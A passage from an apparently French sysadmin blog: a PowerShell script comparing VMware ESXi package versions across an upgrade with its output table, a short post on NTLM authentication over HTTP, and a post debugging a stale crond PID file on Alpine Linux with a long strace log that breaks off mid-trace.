$skippedPackages = $split.Where({ $_.StartsWith("VIBs Skipped") }).Substring(14).Split(@(", "), [System.StringSplitOptions]::RemoveEmptyEntries)

$keys = ($newPackages + $oldPackages + $skippedPackages).ForEach({ $_.Substring(0, $_.LastIndexOf('_'))})

$result = $keys.ForEach({
    $package = $_

    $newVersion = $newPackages.Where({ $_.StartsWith($package + '_') })
    $oldVersion = $oldPackages.Where({ $_.StartsWith($package + '_') })
    $skipVersion = $skippedPackages.Where({ $_.StartsWith($package + '_') })

    if (-not [String]::IsNullOrEmpty($newVersion)) {
        $newVersion = $newVersion.Substring($newVersion.LastIndexOf('_') + 1)
    } else {
        $newVersion = $null
    }

    if (-not [String]::IsNullOrEmpty($oldVersion)) {
        $oldVersion = $oldVersion.Substring($oldVersion.LastIndexOf('_') + 1)
    } else {
        $oldVersion = $null
    }

    if (-not [String]::IsNullOrEmpty($skipVersion)) {
        $skipVersion = $skipVersion.Substring($skipVersion.LastIndexOf('_') + 1)
    } else {
        $skipVersion = $null
    }

    $o = @{
        PackageName = $package
        NewVersion = $newVersion
        OldVersion = $oldVersion
        SkipVersion = $skipVersion
    }

    New-Object psobject -Property $o
})

$result | ft PackageName, OldVersion, NewVersion, SkipVersion

Il suffit de remplacer le contenu de $in par ta sortie et $result contiendra désormais la liste des packages impactés avec la version d’origine et la version de destination. Il est de même rapide de voir les paquets définitivement supprimés, les nouveaux et ceux qui ne seront pas impactés par la mise à jour.

$result | ft PackageName, OldVersion, NewVersion, SkipVersion

PackageName                                   OldVersion                          NewVersion                           SkipVersion       
-----------                                   ----------                          ----------                           -----------       
VMware_bootbank_ata-pata-amd                  0.3.10-3vmw.500.0.0.469512          0.3.10-3vmw.510.0.0.799733                             
VMware_bootbank_ata-pata-atiixp               0.4.6-3vmw.500.0.0.469512           0.4.6-4vmw.510.0.0.799733                              
VMware_bootbank_ata-pata-cmd64x               0.2.5-3vmw.500.0.0.469512           0.2.5-3vmw.510.0.0.799733                              
VMware_bootbank_ata-pata-hpt3x2n              0.3.4-3vmw.500.0.0.469512           0.3.4-3vmw.510.0.0.799733                              
VMware_bootbank_ata-pata-pdc2027x             1.0-3vmw.500.0.0.469512             1.0-3vmw.510.0.0.799733                                
VMware_bootbank_ata-pata-serverworks          0.4.3-3vmw.500.0.0.469512           0.4.3-3vmw.510.0.0.799733                              
VMware_bootbank_ata-pata-sil680               0.4.8-3vmw.500.0.0.469512           0.4.8-3vmw.510.0.0.799733                              
VMware_bootbank_ata-pata-via                  0.3.3-2vmw.500.0.0.469512           0.3.3-2vmw.510.0.0.799733                              
VMware_bootbank_block-cciss                   3.6.14-10vmw.500.0.0.469512         3.6.14-10vmw.510.0.0.799733                            
VMware_bootbank_ehci-ehci-hcd                 1.0-3vmw.500.1.11.623860            1.0-3vmw.510.0.0.799733                                
VMware_bootbank_esx-base                      5.0.0-3.90.3982828                  5.1.0-3.85.3872664                                     
VMware_bootbank_esx-dvfilter-generic-fastpath                                     5.1.0-0.0.799733                                       
VMware_bootbank_esx-tboot                     5.0.0-2.26.914586                   5.1.0-2.23.1483097                                     
VMware_bootbank_esx-xlibs                                                         5.1.0-1.22.1472666                                     
VMware_bootbank_esx-xserver                                                       5.1.0-1.22.1472666                                     
VMware_bootbank_ima-qla4xxx                   2.01.07-1vmw.500.0.0.469512         2.01.31-1vmw.510.0.0.799733                            
VMware_bootbank_ipmi-ipmi-devintf             39.1-4vmw.500.0.0.469512            39.1-4vmw.510.0.0.799733                               
VMware_bootbank_ipmi-ipmi-msghandler          39.1-4vmw.500.0.0.469512            39.1-4vmw.510.0.0.799733                               
VMware_bootbank_ipmi-ipmi-si-drv              39.1-4vmw.500.2.26.914586           39.1-4vmw.510.1.12.1065491                             
VMware_bootbank_misc-cnic-register            1.1-1vmw.500.0.0.469512             1.1-1vmw.510.0.0.799733                                
VMware_bootbank_misc-drivers                  5.0.0-3.68.2509828                  5.1.0-3.55.2583090                                     
VMware_bootbank_net-be2net                    4.0.88.0-1vmw.500.0.7.515841        4.1.255.11-1vmw.510.0.0.799733                         
VMware_bootbank_net-bnx2                      2.0.15g.v50.11-5vmw.500.0.0.469512  2.0.15g.v50.11-7vmw.510.1.12.1065491                   
VMware_bootbank_net-bnx2x                     1.61.15.v50.1-2vmw.500.2.38.1311177 1.61.15.v50.3-1vmw.510.0.11.1063671                    
VMware_bootbank_net-cnic                      1.10.2j.v50.7-2vmw.500.0.0.469512   1.10.2j.v50.7-3vmw.510.0.0.799733                      
VMware_bootbank_net-e1000                     8.0.3.1-2vmw.500.2.35.1254542       8.0.3.1-2vmw.510.1.16.1157734                          
VMware_bootbank_net-e1000e                    1.1.2-3vmw.500.3.45.1489271         1.1.2-3vmw.510.2.23.1483097                            
VMware_bootbank_net-enic                      1.4.2.15a-1vmw.500.0.0.469512       1.4.2.15a-1vmw.510.0.0.799733                          
VMware_bootbank_net-forcedeth                 0.61-2vmw.500.0.0.469512            0.61-2vmw.510.0.0.799733                               
VMware_bootbank_net-igb                       2.1.11.1-3vmw.500.2.26.914586       2.1.11.1-3vmw.510.1.12.1065491                         
VMware_bootbank_net-ixgbe                     2.0.84.8.2-11vmw.500.2.26.914586    3.7.13.6iov-10vmw.510.1.20.1312873                     
VMware_bootbank_net-nx-nic                    4.0.557-3vmw.500.1.11.623860        4.0.558-3vmw.510.0.0.799733                            
VMware_bootbank_net-r8168                     8.013.00-3vmw.500.0.0.469512        8.013.00-3vmw.510.0.0.799733                           
VMware_bootbank_net-r8169                     6.011.00-2vmw.500.0.0.469512        6.011.00-2vmw.510.0.0.799733                           
VMware_bootbank_net-s2io                      2.1.4.13427-3vmw.500.0.0.469512     2.1.4.13427-3vmw.510.0.0.799733                        
VMware_bootbank_net-sky2                      1.20-2vmw.500.0.0.469512            1.20-2vmw.510.0.0.799733                               
VMware_bootbank_net-tg3                       3.123b.v50.1-1vmw.500.2.26.914586   3.123b.v50.1-1vmw.510.2.23.1483097                     
VMware_bootbank_net-vmxnet3                                                       1.1.3.0-3vmw.510.3.55.2583090                          
VMware_bootbank_ohci-usb-ohci                 1.0-3vmw.500.0.0.469512             1.0-3vmw.510.0.0.799733                                
VMware_bootbank_sata-ahci                     3.0-6vmw.500.1.11.623860            3.0-15vmw.510.2.23.1483097                             
VMware_bootbank_sata-ata-piix                 2.12-4vmw.500.1.11.623860           2.12-7vmw.510.2.23.1483097                             
VMware_bootbank_sata-sata-nv                  3.5-3vmw.500.0.0.469512             3.5-4vmw.510.0.0.799733                                
VMware_bootbank_sata-sata-promise             2.12-3vmw.500.0.0.469512            2.12-3vmw.510.0.0.799733                               
VMware_bootbank_sata-sata-sil24                                                   1.1-1vmw.510.0.0.799733                                
VMware_bootbank_sata-sata-sil                 2.3-3vmw.500.0.0.469512             2.3-4vmw.510.0.0.799733                                
VMware_bootbank_sata-sata-svw                 2.3-3vmw.500.0.0.469512             2.3-3vmw.510.0.0.799733                                
VMware_bootbank_scsi-aacraid                  1.1.5.1-9vmw.500.1.11.623860        1.1.5.1-9vmw.510.0.0.799733                            
VMware_bootbank_scsi-adp94xx                  1.0.8.12-6vmw.500.0.0.469512        1.0.8.12-6vmw.510.0.0.799733                           
VMware_bootbank_scsi-aic79xx                  3.1-5vmw.500.0.0.469512             3.1-5vmw.510.0.0.799733                                
VMware_bootbank_scsi-bnx2i                    1.9.1d.v50.1-3vmw.500.0.0.469512    1.9.1d.v50.1-5vmw.510.0.0.799733                       
VMware_bootbank_scsi-fnic                     1.5.0.3-1vmw.500.0.0.469512         1.5.0.3-1vmw.510.0.0.799733                            
VMware_bootbank_scsi-hpsa                     5.0.0-17vmw.500.3.41.1311175        5.0.0-21vmw.510.1.16.1157734                           
VMware_bootbank_scsi-ips                      7.12.05-4vmw.500.0.0.469512         7.12.05-4vmw.510.0.0.799733                            
VMware_bootbank_scsi-lpfc820                  8.2.2.1-18vmw.500.2.26.914586       8.2.3.1-127vmw.510.0.0.799733                          
VMware_bootbank_scsi-megaraid-mbox            2.20.5.1-6vmw.500.0.0.469512        2.20.5.1-6vmw.510.0.0.799733                           
VMware_bootbank_scsi-megaraid-sas             5.34-1vmw.500.3.63.2312428          5.34-4vmw.510.3.50.2323236                             
VMware_bootbank_scsi-megaraid2                2.00.4-9vmw.500.0.0.469512          2.00.4-9vmw.510.0.0.799733                             
VMware_bootbank_scsi-mpt2sas                  06.00.00.00-6vmw.500.3.63.2312428   10.00.00.00-5vmw.510.2.44.2191751                      
VMware_bootbank_scsi-mptsas                   4.23.01.00-5vmw.500.3.63.2312428    4.23.01.00-6vmw.510.2.44.2191751                       
VMware_bootbank_scsi-mptspi                   4.23.01.00-5vmw.500.3.63.2312428    4.23.01.00-6vmw.510.2.44.2191751                       
VMware_bootbank_scsi-qla2xxx                  901.k1.1-14vmw.500.0.0.469512       902.k1.1-9vmw.510.0.0.799733                           
VMware_bootbank_scsi-qla4xxx                  5.01.03.2-3vmw.500.0.0.469512       5.01.03.2-4vmw.510.0.0.799733                          
VMware_bootbank_scsi-rste                     2.0.2.0088-1vmw.500.3.45.1489271    2.0.2.0088-1vmw.510.2.23.1483097                       
VMware_bootbank_uhci-usb-uhci                 1.0-3vmw.500.0.0.469512             1.0-3vmw.510.0.0.799733                                
VMware_bootbank_ata-pata-amd                  0.3.10-3vmw.500.0.0.469512          0.3.10-3vmw.510.0.0.799733                             
VMware_bootbank_ata-pata-atiixp               0.4.6-3vmw.500.0.0.469512           0.4.6-4vmw.510.0.0.799733                              
VMware_bootbank_ata-pata-cmd64x               0.2.5-3vmw.500.0.0.469512           0.2.5-3vmw.510.0.0.799733                              
VMware_bootbank_ata-pata-hpt3x2n              0.3.4-3vmw.500.0.0.469512           0.3.4-3vmw.510.0.0.799733                              
VMware_bootbank_ata-pata-pdc2027x             1.0-3vmw.500.0.0.469512             1.0-3vmw.510.0.0.799733                                
VMware_bootbank_ata-pata-serverworks          0.4.3-3vmw.500.0.0.469512           0.4.3-3vmw.510.0.0.799733                              
VMware_bootbank_ata-pata-sil680               0.4.8-3vmw.500.0.0.469512           0.4.8-3vmw.510.0.0.799733                              
VMware_bootbank_ata-pata-via                  0.3.3-2vmw.500.0.0.469512           0.3.3-2vmw.510.0.0.799733                              
VMware_bootbank_block-cciss                   3.6.14-10vmw.500.0.0.469512         3.6.14-10vmw.510.0.0.799733                            
VMware_bootbank_ehci-ehci-hcd                 1.0-3vmw.500.1.11.623860            1.0-3vmw.510.0.0.799733                                
VMware_bootbank_esx-base                      5.0.0-3.90.3982828                  5.1.0-3.85.3872664                                     
VMware_bootbank_esx-tboot                     5.0.0-2.26.914586                   5.1.0-2.23.1483097                                     
VMware_bootbank_ima-qla4xxx                   2.01.07-1vmw.500.0.0.469512         2.01.31-1vmw.510.0.0.799733                            
VMware_bootbank_ipmi-ipmi-devintf             39.1-4vmw.500.0.0.469512            39.1-4vmw.510.0.0.799733                               
VMware_bootbank_ipmi-ipmi-msghandler          39.1-4vmw.500.0.0.469512            39.1-4vmw.510.0.0.799733                               
VMware_bootbank_ipmi-ipmi-si-drv              39.1-4vmw.500.2.26.914586           39.1-4vmw.510.1.12.1065491                             
VMware_bootbank_misc-cnic-register            1.1-1vmw.500.0.0.469512             1.1-1vmw.510.0.0.799733                                
VMware_bootbank_misc-drivers                  5.0.0-3.68.2509828                  5.1.0-3.55.2583090                                     
VMware_bootbank_net-be2net                    4.0.88.0-1vmw.500.0.7.515841        4.1.255.11-1vmw.510.0.0.799733                         
VMware_bootbank_net-bnx2                      2.0.15g.v50.11-5vmw.500.0.0.469512  2.0.15g.v50.11-7vmw.510.1.12.1065491                   
VMware_bootbank_net-bnx2x                     1.61.15.v50.1-2vmw.500.2.38.1311177 1.61.15.v50.3-1vmw.510.0.11.1063671                    
VMware_bootbank_net-cnic                      1.10.2j.v50.7-2vmw.500.0.0.469512   1.10.2j.v50.7-3vmw.510.0.0.799733                      
VMware_bootbank_net-e1000                     8.0.3.1-2vmw.500.2.35.1254542       8.0.3.1-2vmw.510.1.16.1157734                          
VMware_bootbank_net-e1000e                    1.1.2-3vmw.500.3.45.1489271         1.1.2-3vmw.510.2.23.1483097                            
VMware_bootbank_net-enic                      1.4.2.15a-1vmw.500.0.0.469512       1.4.2.15a-1vmw.510.0.0.799733                          
VMware_bootbank_net-forcedeth                 0.61-2vmw.500.0.0.469512            0.61-2vmw.510.0.0.799733                               
VMware_bootbank_net-igb                       2.1.11.1-3vmw.500.2.26.914586       2.1.11.1-3vmw.510.1.12.1065491                         
VMware_bootbank_net-ixgbe                     2.0.84.8.2-11vmw.500.2.26.914586    3.7.13.6iov-10vmw.510.1.20.1312873                     
VMware_bootbank_net-nx-nic                    4.0.557-3vmw.500.1.11.623860        4.0.558-3vmw.510.0.0.799733                            
VMware_bootbank_net-r8168                     8.013.00-3vmw.500.0.0.469512        8.013.00-3vmw.510.0.0.799733                           
VMware_bootbank_net-r8169                     6.011.00-2vmw.500.0.0.469512        6.011.00-2vmw.510.0.0.799733                           
VMware_bootbank_net-s2io                      2.1.4.13427-3vmw.500.0.0.469512     2.1.4.13427-3vmw.510.0.0.799733                        
VMware_bootbank_net-sky2                      1.20-2vmw.500.0.0.469512            1.20-2vmw.510.0.0.799733                               
VMware_bootbank_net-tg3                       3.123b.v50.1-1vmw.500.2.26.914586   3.123b.v50.1-1vmw.510.2.23.1483097                     
VMware_bootbank_ohci-usb-ohci                 1.0-3vmw.500.0.0.469512             1.0-3vmw.510.0.0.799733                                
VMware_bootbank_sata-ahci                     3.0-6vmw.500.1.11.623860            3.0-15vmw.510.2.23.1483097                             
VMware_bootbank_sata-ata-piix                 2.12-4vmw.500.1.11.623860           2.12-7vmw.510.2.23.1483097                             
VMware_bootbank_sata-sata-nv                  3.5-3vmw.500.0.0.469512             3.5-4vmw.510.0.0.799733                                
VMware_bootbank_sata-sata-promise             2.12-3vmw.500.0.0.469512            2.12-3vmw.510.0.0.799733                               
VMware_bootbank_sata-sata-sil                 2.3-3vmw.500.0.0.469512             2.3-4vmw.510.0.0.799733                                
VMware_bootbank_sata-sata-svw                 2.3-3vmw.500.0.0.469512             2.3-3vmw.510.0.0.799733                                
VMware_bootbank_scsi-aacraid                  1.1.5.1-9vmw.500.1.11.623860        1.1.5.1-9vmw.510.0.0.799733                            
VMware_bootbank_scsi-adp94xx                  1.0.8.12-6vmw.500.0.0.469512        1.0.8.12-6vmw.510.0.0.799733                           
VMware_bootbank_scsi-aic79xx                  3.1-5vmw.500.0.0.469512             3.1-5vmw.510.0.0.799733                                
VMware_bootbank_scsi-bnx2i                    1.9.1d.v50.1-3vmw.500.0.0.469512    1.9.1d.v50.1-5vmw.510.0.0.799733                       
VMware_bootbank_scsi-fnic                     1.5.0.3-1vmw.500.0.0.469512         1.5.0.3-1vmw.510.0.0.799733                            
VMware_bootbank_scsi-hpsa                     5.0.0-17vmw.500.3.41.1311175        5.0.0-21vmw.510.1.16.1157734                           
VMware_bootbank_scsi-ips                      7.12.05-4vmw.500.0.0.469512         7.12.05-4vmw.510.0.0.799733                            
VMware_bootbank_scsi-lpfc820                  8.2.2.1-18vmw.500.2.26.914586       8.2.3.1-127vmw.510.0.0.799733                          
VMware_bootbank_scsi-megaraid-mbox            2.20.5.1-6vmw.500.0.0.469512        2.20.5.1-6vmw.510.0.0.799733                           
VMware_bootbank_scsi-megaraid-sas             5.34-1vmw.500.3.63.2312428          5.34-4vmw.510.3.50.2323236                             
VMware_bootbank_scsi-megaraid2                2.00.4-9vmw.500.0.0.469512          2.00.4-9vmw.510.0.0.799733                             
VMware_bootbank_scsi-mpt2sas                  06.00.00.00-6vmw.500.3.63.2312428   10.00.00.00-5vmw.510.2.44.2191751                      
VMware_bootbank_scsi-mptsas                   4.23.01.00-5vmw.500.3.63.2312428    4.23.01.00-6vmw.510.2.44.2191751                       
VMware_bootbank_scsi-mptspi                   4.23.01.00-5vmw.500.3.63.2312428    4.23.01.00-6vmw.510.2.44.2191751                       
VMware_bootbank_scsi-qla2xxx                  901.k1.1-14vmw.500.0.0.469512       902.k1.1-9vmw.510.0.0.799733                           
VMware_bootbank_scsi-qla4xxx                  5.01.03.2-3vmw.500.0.0.469512       5.01.03.2-4vmw.510.0.0.799733                          
VMware_bootbank_scsi-rste                     2.0.2.0088-1vmw.500.3.45.1489271    2.0.2.0088-1vmw.510.2.23.1483097                       
VMware_bootbank_uhci-usb-uhci                 1.0-3vmw.500.0.0.469512             1.0-3vmw.510.0.0.799733                                
VMware_locker_tools-light                                                                                              5.1.0-3.85.3872664

Enjoy.

Description de l’authentification via NTLM en HTTP

Petit article que j’ai déniché expliquant comment fonctionne une authentification avec un site web utilisant le fournisseur NTLM. Note: je ne dis pas si c’est bien ou pas d’utiliser NTLM, juste de savoir comment ça marche.

Cela explique toutefois pourquoi je n’arrive pas à reverse-proxifier un site web qui utilise NTLM pour authentifier le client avec nginx.

NTLM Authentication Scheme for HTTP

rc-status ne voit pas crond

Posted on 9 avril 2017Leave a comment

J’ai observé sur mon routeur Alpine que le daemon crond affichait tout le temps crashed.

apu:~# rc-status
Runlevel: default
[...]
 crond                                               [  crashed  ]
[...]

Alors même qu’il était vivant vu que pidof crond me renvoyait bien un PID.

Une analyse du script init.d revèle que le pid devrait se trouver dans le fichier /var/run/crond.pid . Que nenni mon ami, ce fichier contient un PID inexistant, voilà pourquoi rc-status affiche n’importe quoi !

C’est courant lorsque le script init.d récupère le PID du process qu’il lance, alors que ce dernier se fork encore une fois afin de pouvoir fonctionner en background.

On va résoudre ça vite fait. Examinons s’il est possible que crond crée le pid file, ou alors qu’il ne passe pas en arrière plan lui-même mais laisse faire start-stop-daemon.

apu:~# crond -h
dillon's cron daemon 4.5
crond [-s dir] [-c dir] [-t dir] [-m user@host] [-M mailer] [-S|-L [file]] [-l level] [-b|-f|-d]
-s            directory of system crontabs (defaults to /etc/periodic)
-c            directory of per-user crontabs (defaults to /etc/crontabs)
-t            directory of timestamps (defaults to /var/spool/cron/cronstamps)
-m user@host  where should cron output be directed? (defaults to local user)
-M mailer     (defaults to /usr/sbin/sendmail)
-S            log to syslog using identity 'crond' (default)
-L file       log to specified file instead of syslog
-l loglevel   log events <= this level (defaults to notice (level 5))
-b            run in background (default)
-f            run in foreground
-d            run in debugging mode

Au vu des paramètres possibles, je dirais qu’on va tester crond en foreground. On édite donc /etc/conf.d/crond pour préciser à crond de rester en background.

# enter the cron options
CRON_OPTS="-c /etc/crontabs -f"

Et on relance le service avec rc-service crond restart . Et voilà c’est terminé ! … et là on remarque qu’il n’y a plus de crond du tout ! Et pas de messages d’erreur non plus.

Aux grand maux les grands remèdes, je sors l’artillerie lourde afin de comprendre ce qu’il s’est passé pour de vrai. Le passage intéressant est à la fin; il n’est pas nécessaire de lire toutes ces horreurs.

apu:~# strace -f start-stop-daemon -v --start --background --make-pidfile --pidfile /var/run/crond.pid --exec /usr/sbin/crond -- -c /
etc/crontabs -f
execve("/sbin/start-stop-daemon", ["start-stop-daemon", "-v", "--start", "--background", "--make-pidfile", "--pidfile", "/var/run/crond.pid", "--exec", "/usr/sbin/crond", "--", "-c", "/etc/crontabs", "-f"], [/* 16 vars */]) = 0
arch_prctl(ARCH_SET_FS, 0x6f1b8ed83b48) = 0
set_tid_address(0x6f1b8ed83b80)         = 7010
open("/lib/librc.so.1", O_RDONLY|O_CLOEXEC) = 3
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
fstat(3, {st_mode=S_IFREG|0444, st_size=46904, ...}) = 0
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0x#\0\0\0\0\0\0"..., 960) = 960
mmap(NULL, 2146304, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x6f1b8e8ec000
mmap(0x6f1b8eaf6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xa000) = 0x6f1b8eaf6000
close(3)                                = 0
open("/lib/libeinfo.so.1", O_RDONLY|O_CLOEXEC) = 3
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
fstat(3, {st_mode=S_IFREG|0444, st_size=22328, ...}) = 0
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0`\24\0\0\0\0\0\0"..., 960) = 960
mmap(NULL, 2121728, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x6f1b8e6e6000
mmap(0x6f1b8e8ea000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x4000) = 0x6f1b8e8ea000
close(3)                                = 0
mprotect(0x6f1b8eaf6000, 4096, PROT_READ) = 0
mprotect(0x6f1b8e8ea000, 4096, PROT_READ) = 0
mprotect(0x6f1b8ed80000, 4096, PROT_READ) = 0
mprotect(0x196a8a4f000, 4096, PROT_READ) = 0
rt_sigprocmask(SIG_UNBLOCK, [RT_1 RT_2], NULL, 8) = 0
rt_sigaction(SIGINT, {0x196a884ba01, [], SA_RESTORER, 0x6f1b8eb3de07}, NULL, 8) = 0
rt_sigaction(SIGQUIT, {0x196a884ba01, [], SA_RESTORER, 0x6f1b8eb3de07}, NULL, 8) = 0
rt_sigaction(SIGTERM, {0x196a884ba01, [], SA_RESTORER, 0x6f1b8eb3de07}, NULL, 8) = 0
stat("/usr/sbin/crond", {st_mode=S_IFREG|0700, st_size=30952, ...}) = 0
open("/var/run/crond.pid", O_RDONLY)    = -1 ENOENT (No such file or directory)
ioctl(2, TIOCGWINSZ, {ws_row=43, ws_col=133, ws_xpixel=0, ws_ypixel=0}) = 0
ioctl(2, TIOCGWINSZ, {ws_row=43, ws_col=133, ws_xpixel=0, ws_ypixel=0}) = 0
writev(2, [{iov_base=" \33[1m\33[33m*\33[m ", iov_len=15}, {iov_base=NULL, iov_len=0}], 2 * ) = 15
writev(2, [{iov_base="", iov_len=0}, {iov_base=NULL, iov_len=0}], 2) = 0
writev(2, [{iov_base="start-stop-daemon: fopen `/var/r"..., iov_len=72}, {iov_base=NULL, iov_len=0}], 2start-stop-daemon: fopen `/var/run/crond.pid': No such file or directory) = 72
ioctl(2, TIOCGWINSZ, {ws_row=43, ws_col=133, ws_xpixel=0, ws_ypixel=0}) = 0
writev(2, [{iov_base="", iov_len=0}, {iov_base="\33[K", iov_len=3}], 2) = 3
ioctl(1, TIOCGWINSZ, {ws_row=43, ws_col=133, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base="", iov_len=0}, {iov_base="\n", iov_len=1}], 2
) = 1
open("/proc", O_RDONLY|O_DIRECTORY|O_CLOEXEC) = 3
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
stat("/proc/self/status", {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
open("/proc/self/status", O_RDONLY)     = 4
readv(4, [{iov_base="", iov_len=0}, {iov_base="Name:\tstart-stop-daem\nState:\tR ("..., iov_len=1024}], 2) = 930
readv(4, [{iov_base="", iov_len=0}, {iov_base="", iov_len=1024}], 2) = 0
close(4)                                = 0
getdents64(3, /* 71 entries */, 2048)   = 2032
getdents64(3, /* 85 entries */, 2048)   = 2040
getdents64(3, /* 20 entries */, 2048)   = 480
getdents64(3, /* 0 entries */, 2048)    = 0
close(3)                                = 0
ioctl(1, TIOCGWINSZ, {ws_row=43, ws_col=133, ws_xpixel=0, ws_ypixel=0}) = 0
ioctl(1, TIOCGWINSZ, {ws_row=43, ws_col=133, ws_xpixel=0, ws_ypixel=0}) = 0
ioctl(1, TIOCGWINSZ, {ws_row=43, ws_col=133, ws_xpixel=0, ws_ypixel=0}) = 0
ioctl(1, TIOCGWINSZ, {ws_row=43, ws_col=133, ws_xpixel=0, ws_ypixel=0}) = 0
ioctl(1, TIOCGWINSZ, {ws_row=43, ws_col=133, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base=" \33[1m\33[32m*\33[m Detaching to star"..., iov_len=58}, {iov_base="\n", iov_len=1}], 2 * Detaching to start `/usr/sbin/crond' ...
) = 59
unlink("/var/run/crond.pid")            = -1 ENOENT (No such file or directory)
rt_sigaction(SIGCHLD, {0x196a884ba01, [], SA_RESTORER, 0x6f1b8eb3de07}, NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, ~[], [], 8)   = 0
fork(strace: Process 7011 attached
)                                  = 7011
[pid  7010] rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>
[pid  7011] gettid( <unfinished ...>
[pid  7010] <... rt_sigprocmask resumed> NULL, 8) = 0
[pid  7011] <... gettid resumed> )      = 7011
[pid  7010] open("/etc/rc.conf", O_RDONLY <unfinished ...>
[pid  7011] rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>
[pid  7010] <... open resumed> )        = 3
[pid  7011] <... rt_sigprocmask resumed> NULL, 8) = 0
[pid  7010] readv(3,  <unfinished ...>
[pid  7011] getpid( <unfinished ...>
[pid  7010] <... readv resumed> [{iov_base="", iov_len=0}, {iov_base="# Global OpenRC configuration se"..., iov_len=1024}], 2) = 1024
[pid  7011] <... getpid resumed> )      = 7011
[pid  7010] readv(3,  <unfinished ...>
[pid  7011] umask(022 <unfinished ...>
[pid  7010] <... readv resumed> [{iov_base="", iov_len=0}, {iov_base="dency\n# or do we want all of the"..., iov_len=1024}], 2) = 1024
[pid  7011] <... umask resumed> )       = 022
[pid  7010] readv(3,  <unfinished ...>
[pid  7011] open("/dev/tty", O_RDWR <unfinished ...>
[pid  7010] <... readv resumed> [{iov_base="", iov_len=0}, {iov_base=" allows net.wlan and any service"..., iov_len=1024}], 2) = 1024
[pid  7011] <... open resumed> )        = 3
[pid  7010] readv(3,  <unfinished ...>
[pid  7011] open("/dev/null", O_RDWR <unfinished ...>
[pid  7010] <... readv resumed> [{iov_base="", iov_len=0}, {iov_base="\n# then child barfs on a configu"..., iov_len=1024}], 2) = 1024
[pid  7011] <... open resumed> )        = 4
[pid  7010] readv(3,  <unfinished ...>
[pid  7011] open("/var/run/crond.pid", O_WRONLY|O_CREAT|O_TRUNC, 0666 <unfinished ...>
[pid  7010] <... readv resumed> [{iov_base="", iov_len=0}, {iov_base=" wait for a remote server to res"..., iov_len=1024}], 2) = 1024
[pid  7011] <... open resumed> )        = 5
[pid  7010] readv(3,  <unfinished ...>
[pid  7011] ioctl(5, TIOCGWINSZ <unfinished ...>
[pid  7010] <... readv resumed> [{iov_base="", iov_len=0}, {iov_base=" a per service basis, like the n"..., iov_len=1024}], 2) = 1024
[pid  7011] <... ioctl resumed> , 0x729b2f2dfcd8) = -1 ENOTTY (Not a tty)
[pid  7010] readv(3,  <unfinished ...>
[pid  7011] writev(5, [{iov_base="7011\n", iov_len=5}, {iov_base=NULL, iov_len=0}], 2 <unfinished ...>
[pid  7010] <... readv resumed> [{iov_base="", iov_len=0}, {iov_base="################################"..., iov_len=1024}], 2) = 1024
[pid  7011] <... writev resumed> )      = 5
[pid  7010] readv(3,  <unfinished ...>
[pid  7011] close(5 <unfinished ...>
[pid  7010] <... readv resumed> [{iov_base="", iov_len=0}, {iov_base="T\n\n# If you have cgroups turned "..., iov_len=1024}], 2) = 1024
[pid  7011] <... close resumed> )       = 0
[pid  7010] readv(3,  <unfinished ...>
[pid  7011] ioctl(3, TIOCNOTTY <unfinished ...>
[pid  7010] <... readv resumed> [{iov_base="", iov_len=0}, {iov_base="or this service.\n#rc_cgroup_blki"..., iov_len=1024}], 2) = 1024
[pid  7011] <... ioctl resumed> )       = 0
[pid  7010] readv(3,  <unfinished ...>
[pid  7011] close(3 <unfinished ...>
[pid  7010] <... readv resumed> [{iov_base="", iov_len=0}, {iov_base="/conf.d/<service>.\n# To perform "..., iov_len=1024}], 2) = 219
[pid  7011] <... close resumed> )       = 0
[pid  7010] readv(3, [{iov_base="", iov_len=0}, {iov_base="", iov_len=1024}], 2) = 0
[pid  7011] dup2(4, 0 <unfinished ...>
[pid  7010] close(3 <unfinished ...>
[pid  7011] <... dup2 resumed> )        = 0
[pid  7010] <... close resumed> )       = 0
[pid  7011] dup2(4, 1 <unfinished ...>
[pid  7010] stat("/etc/conf.d/rc", 0x729b2f2dfc58) = -1 ENOENT (No such file or directory)
[pid  7010] open("/etc/rc.conf.d", O_RDONLY|O_DIRECTORY|O_CLOEXEC <unfinished ...>
[pid  7011] <... dup2 resumed> )        = 1
[pid  7010] <... open resumed> )        = -1 ENOENT (No such file or directory)
[pid  7011] dup2(4, 2 <unfinished ...>
[pid  7010] stat("/proc/cmdline",  <unfinished ...>
[pid  7011] <... dup2 resumed> )        = 2
[pid  7010] <... stat resumed> {st_mode=S_IFREG|0440, st_size=0, ...}) = 0
[pid  7011] prlimit64(0, RLIMIT_NOFILE, NULL,  <unfinished ...>
[pid  7010] open("/proc/cmdline", O_RDONLY <unfinished ...>
[pid  7011] <... prlimit64 resumed> {rlim_cur=1024, rlim_max=4*1024}) = 0
[pid  7010] <... open resumed> )        = 3
[pid  7011] close(1023 <unfinished ...>
[pid  7010] readv(3,  <unfinished ...>
[pid  7011] <... close resumed> )       = -1 EBADF (Bad file descriptor)
[pid  7010] <... readv resumed> [{iov_base="", iov_len=0}, {iov_base="BOOT_IMAGE=vmlinuz-grsec root=/d"..., iov_len=1024}], 2) = 132
[pid  7011] close(1022 <unfinished ...>
[pid  7010] close(3 <unfinished ...>
[pid  7011] <... close resumed> )       = -1 EBADF (Bad file descriptor)
[pid  7010] <... close resumed> )       = 0
[pid  7011] close(1021 <unfinished ...>
[pid  7010] exit_group(0)               = ?
[pid  7011] <... close resumed> )       = -1 EBADF (Bad file descriptor)
[pid  7010] +++ exited with 0 +++
close(1020)                             = -1 EBADF (Bad file descriptor)
close(1019)                             = -1 EBADF (Bad file descriptor)
close(1018)                             = -1 EBADF (Bad file descriptor)
